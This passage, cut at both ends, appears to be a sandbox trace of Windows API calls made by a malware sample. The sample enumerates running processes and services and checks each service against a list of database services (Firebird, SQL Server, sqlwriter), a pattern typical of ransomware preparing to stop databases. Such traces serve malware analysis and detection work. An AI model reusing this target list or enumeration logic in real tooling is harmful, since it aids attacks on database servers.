szExeFile="audiodg.exe")) returned 1 [0189.035] lstrlenW (lpString="audiodg.exe") returned 11 [0189.035] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0189.035] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0189.035] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0189.036] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0189.036] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0189.037] lstrlenW (lpString="Memory Compression") returned 18 [0189.037] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0189.037] lstrlenW (lpString="sihost.exe") returned 10 [0189.037] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.038] lstrlenW (lpString="svchost.exe") returned 11 [0189.038] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0189.039] lstrlenW (lpString="msoia.exe") returned 9 [0189.039] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0189.039] lstrlenW (lpString="taskhostw.exe") returned 13 [0189.039] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.040] lstrlenW (lpString="explorer.exe") returned 12 [0189.040] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0189.040] lstrlenW (lpString="SearchUI.exe") returned 12 [0189.041] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0189.041] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0189.041] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0189.042] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0189.042] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.043] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0189.043] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0189.043] lstrlenW (lpString="hgaibc.exe") returned 10 [0189.043] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0189.044] CloseHandle (hObject=0x394) returned 1 [0189.044] Sleep (dwMilliseconds=0x1f4) [0189.548] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bf038 [0189.548] EnumServicesStatusExW (in: hSCManager=0x6bf038, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0189.549] GetLastError () returned 0xea [0189.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d87a0 [0189.549] EnumServicesStatusExW (in: hSCManager=0x6bf038, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d87a0, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d87a0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0189.550] CloseServiceHandle (hSCObject=0x6bf038) returned 1 [0189.550] lstrlenW (lpString="Appinfo") returned 7 [0189.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0189.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0189.550] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0189.550] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0189.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0189.551] lstrlenW (lpString="AppXSvc") returned 7 [0189.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0189.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0189.551] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0189.551] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0189.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0189.551] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0189.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0189.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0189.551] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0189.551] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0189.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0189.551] lstrlenW (lpString="Audiosrv") returned 8 [0189.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0189.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0189.551] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0189.551] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0189.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0189.551] lstrlenW (lpString="BFE") returned 3 [0189.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0189.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0189.551] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0189.551] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0189.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0189.551] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0189.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0189.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0189.551] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0189.552] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0189.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0189.552] lstrlenW (lpString="CDPSvc") returned 6 [0189.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0189.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0189.552] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0189.552] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0189.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0189.552] lstrlenW (lpString="ClickToRunSvc") returned 13 [0189.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0189.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0189.552] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0189.552] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0189.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0189.552] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0189.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0189.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0189.552] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0189.552] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0189.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0189.552] lstrlenW (lpString="CryptSvc") returned 8 [0189.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0189.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0189.552] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0189.552] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0189.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0189.552] lstrlenW (lpString="DcomLaunch") returned 10 [0189.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0189.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0189.553] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0189.553] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0189.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0189.553] lstrlenW (lpString="DeviceAssociationService") returned 24 [0189.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0189.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0189.553] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0189.553] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0189.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0189.553] lstrlenW (lpString="Dhcp") returned 4 [0189.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0189.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0189.553] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0189.553] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0189.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0189.553] lstrlenW (lpString="Dnscache") returned 8 [0189.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0189.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0189.553] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0189.553] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0189.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0189.553] lstrlenW (lpString="DPS") returned 3 [0189.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0189.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0189.553] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0189.553] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0189.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0189.554] lstrlenW (lpString="DusmSvc") returned 7 [0189.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0189.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0189.554] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0189.554] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0189.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0189.554] lstrlenW (lpString="EventLog") returned 8 [0189.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0189.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0189.554] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0189.554] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0189.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0189.554] lstrlenW (lpString="EventSystem") returned 11 [0189.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0189.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0189.554] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0189.554] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0189.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0189.554] lstrlenW (lpString="FontCache") returned 9 [0189.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0189.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0189.554] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0189.554] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0189.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0189.554] lstrlenW (lpString="gpsvc") returned 5 [0189.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0189.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0189.554] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0189.555] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0189.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0189.555] lstrlenW (lpString="iphlpsvc") returned 8 [0189.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0189.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0189.555] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0189.555] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0189.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0189.555] lstrlenW (lpString="KeyIso") returned 6 [0189.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0189.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0189.555] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0189.555] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0189.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0189.555] lstrlenW (lpString="LanmanServer") returned 12 [0189.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0189.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0189.555] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0189.555] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0189.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0189.555] lstrlenW (lpString="LanmanWorkstation") returned 17 [0189.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0189.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0189.555] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0189.555] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0189.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0189.555] lstrlenW (lpString="lfsvc") returned 5 [0189.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0189.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0189.555] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0189.556] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0189.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0189.556] lstrlenW (lpString="lmhosts") returned 7 [0189.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0189.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0189.556] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0189.556] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0189.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0189.556] lstrlenW (lpString="LSM") returned 3 [0189.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0189.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0189.556] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0189.556] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0189.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0189.556] lstrlenW (lpString="MpsSvc") returned 6 [0189.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0189.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0189.556] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0189.556] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0189.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0189.556] lstrlenW (lpString="NcbService") returned 10 [0189.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0189.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0189.556] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0189.556] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0189.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0189.556] lstrlenW (lpString="netprofm") returned 8 [0189.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0189.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0189.556] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0189.557] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0189.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0189.557] lstrlenW (lpString="NgcSvc") returned 6 [0189.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0189.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0189.557] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0189.557] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0189.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0189.557] lstrlenW (lpString="NlaSvc") returned 6 [0189.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0189.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0189.557] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0189.557] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0189.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0189.557] lstrlenW (lpString="nsi") returned 3 [0189.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0189.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0189.557] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0189.557] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0189.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0189.557] lstrlenW (lpString="PcaSvc") returned 6 [0189.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0189.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0189.557] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0189.557] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0189.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0189.557] lstrlenW (lpString="PlugPlay") returned 8 [0189.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0189.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0189.557] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0189.557] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0189.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0189.558] lstrlenW (lpString="Power") returned 5 [0189.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0189.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0189.558] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0189.558] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0189.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0189.558] lstrlenW (lpString="ProfSvc") returned 7 [0189.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0189.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0189.558] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0189.558] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0189.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0189.558] lstrlenW (lpString="RpcEptMapper") returned 12 [0189.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0189.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0189.558] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0189.558] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0189.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0189.558] lstrlenW (lpString="RpcSs") returned 5 [0189.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0189.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0189.558] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0189.558] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0189.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0189.558] lstrlenW (lpString="SamSs") returned 5 [0189.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0189.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0189.558] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0189.558] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0189.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0189.559] lstrlenW (lpString="Schedule") returned 8 [0189.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0189.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0189.559] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0189.559] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0189.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0189.559] lstrlenW (lpString="SecurityHealthService") returned 21 [0189.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0189.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0189.559] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0189.559] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0189.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0189.559] lstrlenW (lpString="SENS") returned 4 [0189.559] lstrcmpiW 